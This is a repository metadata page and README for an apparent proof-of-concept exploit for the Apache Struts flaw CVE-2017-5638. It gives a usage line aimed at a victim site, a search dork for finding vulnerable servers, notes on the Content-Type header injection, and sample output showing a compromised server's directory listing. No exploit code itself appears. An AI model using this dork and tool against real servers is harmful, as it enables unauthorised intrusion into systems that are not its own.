https://github.com/xsscx/cve-2017-5638

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit
https://github.com/xsscx/cve-2017-5638

apache code content-type cve-2017-5638 exploit poc python struts2

Last synced: 15 days ago
JSON representation

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

Host: GitHub
URL: https://github.com/xsscx/cve-2017-5638
Owner: xsscx
Created: 2017-03-10T16:56:14.000Z (about 8 years ago)
Default Branch: master
Last Pushed: 2017-03-12T15:43:27.000Z (about 8 years ago)
Last Synced: 2025-04-04T10:04:55.127Z (about 1 month ago)
Topics: apache, code, content-type, cve-2017-5638, exploit, poc, python, struts2
Language: Python
Size: 20.5 KB
Stars: 19
Watchers: 1
Forks: 21
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# CVE-2017-5638 PoC Code in Python | DORK: ext:action
Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action

USAGE: python struts.py https://victim.site dir

The initial Python Script that was Posted didn't correctly format the Content-Type Header.
I recoded the Content Type Header to properly format Content-Type:%20{Exploit}.
I also added a logging and Requests, then dumped the Object Properties to stdout.

SAMPLE OUTPUT

Check for CVE-2017-5638 by XSS.Cx

Volume in drive D has no label.
Volume Serial Number is 2A7B-A245
Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/xsscx/cve-2017-5638

Awesome Lists containing this project

README